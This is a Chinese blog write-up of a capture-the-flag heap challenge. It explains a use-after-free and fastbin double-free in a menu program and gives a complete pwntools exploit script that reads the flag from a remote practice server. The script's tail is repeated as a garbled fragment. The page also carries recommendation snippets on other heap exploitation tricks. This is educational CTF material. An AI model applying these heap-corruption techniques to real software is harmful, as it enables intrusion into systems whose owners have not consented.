gyctf_2020_some_thing_exceting

最新推荐文章于 2023-05-09 19:59:44 发布
最新推荐文章于 2023-05-09 19:59:44 发布
阅读量133 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/129656847
版权

gyctf_2020_some_thing_exceting

惯例我们先checksec一下

请添加图片描述

除了PIE其他保护全开的64位程序 我们先试运行一下

请添加图片描述

发现运行不了 进ida64里看发现是需要在根目录上有一个flag文件

请添加图片描述

添加文件后就可以正常运行了

这里贴一个怎么在根目录下添加文件的指南

sudo nautilus#这条命令由于以管理员的身份打开文件管理器

然后选择filesystem root在其中右键选择打开我们的terminal

请添加图片描述

然后执行touch flag 命令即可生成flag文件

看看main函数 是一体非常标准的菜单题

1 添加堆 2编辑堆 3 删除堆 4 打印堆

请添加图片描述

1 添加堆

请添加图片描述

2 编辑堆(实际上这是个不可执行的函数)

请添加图片描述

3 删除堆

存在uaf漏洞

请添加图片描述

4 打印堆

请添加图片描述

审题完成开始解题

利用uaf漏洞将fastbin的fd指针篡改为flag-0x10然后在show的时候就可以接收到flag了

此题中我们需要注意的是在最后一次add时na的chunk大小需要我们改成除0x50外的任意大小 因为此时我们实际上已经跳转到了flag上因此无法再次跳转

以及最后打印出的flag不知道为啥被吞掉了一部分 可能是对齐的问题 但问题不大 我们只要手动把开头被吞掉的f字母填上即可

请添加图片描述

from pwn import *
#io=process('./gyctf_2020_some_thing_exceting')
context.log_level='debug'
io=remote('node4.buuoj.cn',26257)
flag = 0x6020A8-0x10
def add(size1,content1,size2,content2):
	io.recvuntil('> Now please tell me what you want to do :')
	io.sendline('1')
	io.recvuntil('length : ')
	io.sendline(str(size1))
	io.recvuntil('> ba : ')
	io.sendline(content1)
	io.recvuntil('length : ')
	io.sendline(str(size2))
	io.recvuntil('> na : ')
	io.sendline(content2)

def show(index):
	io.recvuntil('to do :')
	io.sendline('4')
	io.recvuntil('project ID : ')
	io.sendline(str(index))

def free(index):
	io.recvuntil('to do :')
	io.sendline('3')
	io.recvuntil('Banana ID : ')
	io.sendline(str(index))


add(0x50,'aaaa',0x50,'bbbb')
add(0x50,'cccc',0x50,'dddd')
add(0x20,'eeee',0x20,'ffff')
free(0)
free(1)
free(0)

add(0x50,p64(flag),0x50,'aaaa')
add(0x50,'aaaa',0x50,'aaaa')
add(0x50,'',0x60,'aaaa')

show(0)
io.interactive()

g),0x50,‘aaaa’)
add(0x50,‘aaaa’,0x50,‘aaaa’)
add(0x50,‘’,0x60,‘aaaa’)

show(0)
io.interactive()
爱若 AI_ruo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fm.rar_Thing Thing_python
09-23
描述中的"it is go come say some thing in the web intenet"虽然语法不清晰,但可以推测可能是指这个"Thing Thing"与Web互联网交互有关,可能是Web应用或者网络通信的一部分。 在IT行业中,Python是一种高级、通用...
WATERSHED.zip_Some Nerve
07-14
I did some preproccessing to the nerve images and then applied the watershed transformation. Now, I want to join the continuous points in watershed segmented image and delete the random points from ...
TensorFlow .tfrecords训练文件生成、使用
DIGTA的博客
11-06 828
.tfrecords训练文件生成 #-*- coding:utf-8 -*- import os import tensorflow as tf import matplotlib.pyplot as plt import numpy as np import cv2 def extract_image(filename, resize_height, resize_width):
[BUUCTF]PWN——gyctf_2020_some_thing_exceting
mcmuyanga的博客
01-22 791
gyctf_2020_some_thing_exceting 附件 步骤: 例行检查,64位程序,除了PIE,其他保护全开 本地试运行一下,看看大概的情况 64位ida载入,检索字符串的时候发现了有关flag的信息,由于我本地上没有创建flag文件,所以一开始输出了12行的puts 创建了一个flag,在执行,可以看到经典的堆的菜单 main(),程序主要有3个功能add,delete和show add() delete() show() 利用思路 程序一开始就读入了fl
【buuctf】gyctf_2020_some_thing_exceting
weixin_51055545的博客
07-22 321
主函数开始时,调用函数,将flag文件打开,注意是在根目录下的flag,然后将flag读到全局变量s处,这个0x60很有帮助,构成了一个堆头;程序申请的0x10的堆块起到了存放指针的作用,很正常的堆布局,直接doublefree,去改指针;64位程序,关闭了pie保护,直接放到ida分析;这里注意要劫持的堆地址为s-0x10,此时;连续申请两次,再show,即可读出flag.将堆块释放后,未将指针置空,存在uaf;先申请2个查看堆布局;漏洞点在删除功能处,...
【buu刷题】gyctf_2020_some_thing_interesting
m0_73756460的博客
05-09 108
【buu刷题】gyctf_2020_some_thing_interesting
XXX.zip_Some of the Parts
09-23
THIS IS A LIBRARY MANAGEMENT SYSTEM IMPLEMENTED IN C YOU CAN USE SOME PARTS OF THE CODE IN YOUR PROGRAM BUT NOT THIS PROGRAM CAN BE PLUBISHED WITHOUT THE AGREEMENT OF THE AUTHOR
遗传算法.zip_some9ju_遗传算法
07-15
有用的遗传算法实例,有助于学习遗传算法,欢迎下载
gcc.rar_The Front
09-20
new targets and some information about how to write front ends for new languages, are documented in a separate manual. See Section “Introduction” in GNU Compiler Collection (GCC) Internals.
gyctf_2020_some_thing_interesting
z1r0的博客
02-21 367
gyctf_2020_some_thing_interesting 查看保护 这里有一个格式化漏洞 还有uaf。 攻击思路:先借助格式化漏洞输出libc。偏移为17上是libc上的数据,因为是libc2.23下的,所以利用fastbin attack将地址任意申请到malloc_hook - 0x23这里,接着改hook为gadget即可。具体的利用手法看z1r0’s blog from pwn import * context(arch='amd64', os='linux', log_level
【buuoj】gyctf_2020_some_thing_interesting1
qq_42220888的博客
12-27 100
buuoj gyctf_2020_some_thing_interesting 1 做题有感
[BUUCTF]PWN——gyctf_2020_some_thing_interesting(格式化字符串+UAF)
mcmuyanga的博客
03-11 825
gyctf_2020_some_thing_interesting 附件 步骤 例行检查,64位程序,保护全开 本地试运行一下程序,看看大概的情况 64位ida载入 sub_B7A() check() create()
linux 堆利用
sky123博客
02-18 4956
堆利用 Unlink 假设正常情况下,每申请一个 chunk 会保存一个指向该 chunk 内存块的指针。 在 chunk1 中构造 fake chunk ,需要注意: 为了绕过 if (__builtin_expect(FD->bk != P || BK->fd != P, 0)) malloc_printerr(check_action, "corrupted double-linked list", P, AV); 令: fake
2021祥云杯部分pwn
weixin_46521144的博客
09-03 635
note 格式化字符串 本题考查了scanf的格式化字符串利用。一般我们用的都是printf的格式化字符串。这里是scanf 踩坑 一开始没有注意到sendline会多发一个换行符,导致往栈上$7的stdout写入的时候老是写不对,结果发现是多发了。 scanf的格式化字符利用方式和printf的比较类似,就是不能直接输出。这里注意到栈上有stdout,可以直接往里面写入绕过判断输出libc_info的fbad1800。 step1 获取libc payload1 = p64(0xfbad1800)+p6
[uaf + off by one -> stdout leak libc] 长城杯pwn1
huzai9527的博客
09-22 432
1. ida分析 存在uaf 和 off by one,可以实现任意地址写 没有show函数,且保护全开,不能修改got表 2. 思路 使用stdout爆破,泄漏libc 先申请几个chunk,通过off by one,构造chunk lapping 再通过uaf修改fd,构成任意地址写 注意点就是,想法设法构造chunk复用 uaf + off by one 总结一下就是,先del构造fastbin,再改chunk head构造unstored bin,再申请一个不是fastbin大小的chunk覆
【buu刷题】ciscn_2019_final_3
m0_73756460的博客
03-18 339
【buu刷题】ciscn_2019_final_3 write up
设立flag
weixin_40629725的博客
03-14 270
现在重新开始学习c程序,周末应该复习之前所做的题目, 变量名 首 _ 和首字母都可以
No module named 'some_module'
最新发布
04-21
当你在Python中遇到"No module named 'some_module'"的错误时,这通常意味着你尝试导入一个不存在的模块或者模块名称拼写错误。 要解决这个问题,你可以采取以下几个步骤: 1. 检查模块名称拼写:确保你正确地输入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值